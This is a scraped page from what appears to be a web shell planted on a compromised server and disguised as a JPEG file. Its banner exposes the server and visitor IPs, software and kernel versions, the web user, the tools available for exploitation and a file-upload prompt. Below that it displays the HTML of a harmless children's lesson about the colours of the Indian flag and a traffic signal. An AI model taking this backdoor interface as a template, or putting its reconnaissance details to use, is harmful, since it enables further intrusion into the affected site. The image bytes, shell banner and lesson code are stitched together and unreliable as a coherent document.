????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.141.164.253 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/apps/school/www_old4/Html/LevelC/Category3/ |
Upload File : |
<!doctype html> <html> <head> <title>Drag color names for the national flags and traffic signal</title> <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script> <style type="text/css"> </style> <script> function page_preLoad() { shared_setDeviceTypeLevelCategoryLastLesson(Level.C, Category.No3); shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta'); shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.C, Category.No3, 6), true, true); shared_setFooterTable('id_tblFooter', true, true, false, true, true); var ids_headings = ['id_td_heading1']; var ids_boxes = ['id_tdBoxForSet1Orange', 'id_tdBoxForSet1White', 'id_tdBoxForSet1Green', 'id_tdBoxForSet2Red', 'id_tdBoxForSet2Yellow', 'id_tdBoxForSet2Green']; var ids_options = ['id_td_options1', 'id_td_options2', 'id_spanSet1Orange', 'id_spanSet1White', 'id_spanSet1Green', 'id_spanSet2Red', 'id_spanSet2Yellow', 'id_spanSet2Green']; var ids_texts = ['id_td_text1', 'id_td_text2', 'id_td_text3', 'id_td_text4', 'id_td_text5', 'id_td_text6', 'id_td_text7', 'id_td_text8', 'id_td_text9', 'id_td_text10', 'id_td_text11', 'id_td_text12', 'id_td_text13', 'id_td_text14', 'id_td_text15']; var ids_All = ids_boxes.concat(ids_texts); shared_adjust_fontSize_for_ids_all_devices(ids_headings, 70); shared_adjust_fontSize_for_ids_all_devices(ids_All, 80); shared_adjust_fontSize_for_ids_all_devices(ids_options, 100); shared_init_dropBox_tds_withOUT_drag_here(ids_boxes); shared_init_dropping_spans(ids_options); var id_tables_array = ['id_table1', 'id_table2', 'id_table3']; shared_border_collapse_for_tables_except_android(id_tables_array); } function page_onLoad() { } function btnPrevious_click() { window.location = 'LevelCCat3Lesson5.html'; } function btnNext_click() { window.location = 'LevelCCat3Lesson7.html'; } function btnHome_click() { shared_btnHomeCategories_click('LevelC'); } function DragDrop_web(event, ids_array) { var id_dropBox = event.target.id; DragDrop(id_dropBox, ids_array); } function DragDrop(id_dropBox, ids_array) { if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array)) { shared_setTextAndBackgroundColorAndIsMovedTrue(shared_currentDropingId, id_dropBox); isAllInfosMovedShowClapsAnimation(); shared_set_currentDropingId_draggbleToFalse(); } else { shared_resetCurrentDroppingPosition(id_dropBox); } } function isAllInfosMovedShowClapsAnimation() { var ids_boxes = ['id_tdBoxForSet1Orange', 'id_tdBoxForSet1White', 'id_tdBoxForSet1Green', 'id_tdBoxForSet2Red', 'id_tdBoxForSet2Yellow', 'id_tdBoxForSet2Green']; shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes); } </script> </head> <body onLoad="page_onLoad()"> <div id="shared_id_div_claps_image"> </div> <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0"> <tr height="8%"> <td> <div id="id_tblHeader"></div> </td> </tr> <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device --> <td> <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="5%"> <!---<td> <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="2%" style="border-collapse:collapse"> <tr>--> <td id="id_td_heading1" width="100%" class="shared_style_blue_24px_bold_padding_left_2_percent">Look at the following. Say and drag the colours in them: </td> <!--</tr> </table> </td>--> </tr> <tr> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="2%"> <tr height="40%"> <td style="padding-bottom:0px"> <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="15%"> <td> <table id="id_tblOptionsSet1" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0" style="border-collapse:collapse"> <tr> <td id="id_td_options1" class="shared_style_options_blue_24px_bold" width="*">Options:</td> <td id="id_td_Set1Orange" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span style="text-align:center" id="id_spanSet1Orange" class="cls_spanSet1Orange shared_style_red_24px_bold">orange</span> </td> <td id="id_td_Set1White" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_spanSet1White" class="cls_spanSet1White shared_style_red_24px_bold">white</span> </td> <td id="id_td_Set1Green" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_spanSet1Green" class="cls_spanSet1Green shared_style_red_24px_bold">green</span> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="*"> <td style="text-align: left"> <img id="id_imgIndianFlag" src="../../../img/LevelC/Category3/LevelCCat3Lesson6/indianFlag.png" width="20%" height="auto"> </td> </tr> <tr height="15%"> <td id="id_td_text1" class="shared_style_black_24px_padding_left_2_percent">This is our National Falg.</td> </tr> <tr height="15%"> <td id="id_td_text2" class="shared_style_black_24px_padding_left_2_percent">Our National Flag has three colours.</td> </tr> <tr height="15%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse"> <tr> <td id="id_td_text3" width="20%" class="shared_style_black_24px_padding_left_2_percent">They are</td> <td id="id_tdBoxForSet1Orange" class="shared_style_black_24px" width="16%" style="text-align: center" ondragover="shared_highlight_web(event); shared_allowDrop_web(event)" ondragleave="shared_un_highlight_web(event)" ondrop="DragDrop_web(event, ['id_spanSet1Orange', 'id_spanSet1White', 'id_spanSet1Green'])">_________</td> <td id="id_td_text4" width="2%" class="shared_style_black_24px" style="vertical-align: bottom"> , </td> <td id="id_tdBoxForSet1White" class="shared_style_black_24px" width="16%" style="text-align: center" ondragover="shared_highlight_web(event); shared_allowDrop_web(event)" ondragleave="shared_un_highlight_web(event)" ondrop="DragDrop_web(event, ['id_spanSet1Orange', 'id_spanSet1White', 'id_spanSet1Green'])">_________</td> <td id="id_td_text5" width="2%" class="shared_style_black_24px"> and </td> <td id="id_tdBoxForSet1Green" class="shared_style_black_24px" width="16%" style="text-align: center" ondragover="shared_highlight_web(event); shared_allowDrop_web(event)" ondragleave="shared_un_highlight_web(event)" ondrop="DragDrop_web(event, ['id_spanSet1Orange', 'id_spanSet1White', 'id_spanSet1Green'])">_________</td> <td id="id_td_text6" width="*" class="shared_style_black_24px"> .</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="*"> <td> <table id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0"> <tr height="10%"> <td> <table id="id_tblOptionsSet2" width="100%" height="100%" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_options2" class="shared_style_options_blue_24px_bold" width="*">Options:</td> <td id="id_td_Set2Red" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_spanSet2Red" class="cls_spanSet2Red shared_style_red_24px_bold">red</span> </td> <td id="id_td_Set2Yellow" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_spanSet2Yellow" class="cls_spanSet2Yellow shared_style_red_24px_bold">yellow</span> </td> <td id="id_td_Set2Green" width="25%" draggable="true" ondragstart="shared_dragStartNew(event)"> <span id="id_spanSet2Green" class="cls_spanSet2Green shared_style_red_24px_bold">green</span> </td> </tr> </table> </td> </tr> <tr height="80%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="*"> <td style="text-align: left"> <img id="id_imgTrafficSignal" src="../../../img/LevelC/Category3/LevelCCat3Lesson6/trafficSignal.png" width="20%" height="auto"> </td> </tr> <tr height="10%"> <td id="id_td_text7" class="shared_style_black_24px_padding_left_2_percent">It is trafficSignal.</td> </tr> <tr height="10%"> <td id="id_td_text8" class="shared_style_black_24px_padding_left_2_percent">It has three colours.</td> </tr> <tr height="10%"> <td> <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td id="id_td_text9" class="shared_style_black_24px_padding_left_2_percent" width="20%">They are</td> <td id="id_tdBoxForSet2Red" class="shared_style_black_24px" width="16%" style="text-align: center" ondragover="shared_highlight_web(event); shared_allowDrop_web(event)" ondragleave="shared_un_highlight_web(event)" ondrop="DragDrop_web(event, ['id_spanSet2Red', 'id_spanSet2Yellow', 'id_spanSet2Green'])">_________</td> <td id="id_td_text10" class="shared_style_black_24px" width="2%"> , </td> <td id="id_tdBoxForSet2Yellow" class="shared_style_black_24px" width="16%" style="text-align: center" ondragover="shared_highlight_web(event); shared_allowDrop_web(event)" ondragleave="shared_un_highlight_web(event)" ondrop="DragDrop_web(event, ['id_spanSet2Red', 'id_spanSet2Yellow', 'id_spanSet2Green'])">_________</td> <td id="id_td_text11" class="shared_style_black_24px" width="2%"> and </td> <td id="id_tdBoxForSet2Green" class="shared_style_black_24px" width="16%" style="text-align: center" ondragover="shared_highlight_web(event); shared_allowDrop_web(event)" ondragleave="shared_un_highlight_web(event)" ondrop="DragDrop_web(event, ['id_spanSet2Red', 'id_spanSet2Yellow', 'id_spanSet2Green'])">_________</td> <td id="id_td_text12" class="shared_style_black_24px" width="*"> .</td> </tr> </table> </td> </tr> <tr height="10%"> <td id="id_td_text13" class="shared_style_black_24px_padding_left_2_percent">Red says <span style="color:red">Stop</span>.</td> </tr> <tr height="10%"> <td id="id_td_text14" class="shared_style_black_24px_padding_left_2_percent">Yellow says <span style="color:#D7DF01">Ready</span>.</td> </tr> <tr height="10%"> <td id="id_td_text15" class="shared_style_black_24px_padding_left_2_percent">Green says <span style="color:green">Go</span>.</td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr height="8%"> <td> <div id="id_tblFooter"></div> </td> </tr> </table> <script> page_preLoad(); new webkit_draggable('id_spanSet1Orange', {handle : 'id_td_Set1Orange', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_spanSet1White', {handle : 'id_td_Set1White', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_spanSet1Green', {handle : 'id_td_Set1Green', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_spanSet2Red', {handle : 'id_td_Set2Red', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_spanSet2Yellow', {handle : 'id_td_Set2Yellow', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); new webkit_draggable('id_spanSet2Green', {handle : 'id_td_Set2Green', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}}); webkit_drop.add('id_tdBoxForSet1Orange', {onOver : function(){shared_highlight('id_tdBoxForSet1Orange')}, onOut : function(){shared_un_highlight('id_tdBoxForSet1Orange')}, onDrop : function(){DragDrop('id_tdBoxForSet1Orange', ['id_spanSet1Orange', 'id_spanSet1White', 'id_spanSet1Green'])}}); webkit_drop.add('id_tdBoxForSet1White', {onOver : function(){shared_highlight('id_tdBoxForSet1White')}, onOut : function(){shared_un_highlight('id_tdBoxForSet1White')}, onDrop : function(){DragDrop('id_tdBoxForSet1White', ['id_spanSet1Orange', 'id_spanSet1White', 'id_spanSet1Green'])}}); webkit_drop.add('id_tdBoxForSet1Green', {onOver : function(){shared_highlight('id_tdBoxForSet1Green')}, onOut : function(){shared_un_highlight('id_tdBoxForSet1Green')}, onDrop : function(){DragDrop('id_tdBoxForSet1Green', ['id_spanSet1Orange', 'id_spanSet1White', 'id_spanSet1Green'])}}); webkit_drop.add('id_tdBoxForSet2Red', {onOver : function(){shared_highlight('id_tdBoxForSet2Red')}, onOut : function(){shared_un_highlight('id_tdBoxForSet2Red')}, onDrop : function(){DragDrop('id_tdBoxForSet2Red', ['id_spanSet2Red', 'id_spanSet2Yellow', 'id_spanSet2Green'])}}); webkit_drop.add('id_tdBoxForSet2Yellow', {onOver : function(){shared_highlight('id_tdBoxForSet2Yellow')}, onOut : function(){shared_un_highlight('id_tdBoxForSet2Yellow')}, onDrop : function(){DragDrop('id_tdBoxForSet2Yellow', ['id_spanSet2Red', 'id_spanSet2Yellow', 'id_spanSet2Green'])}}); webkit_drop.add('id_tdBoxForSet2Green', {onOver : function(){shared_highlight('id_tdBoxForSet2Green')}, onOut : function(){shared_un_highlight('id_tdBoxForSet2Green')}, onDrop : function(){DragDrop('id_tdBoxForSet2Green', ['id_spanSet2Red', 'id_spanSet2Yellow', 'id_spanSet2Green'])}}); </script> </body> </html>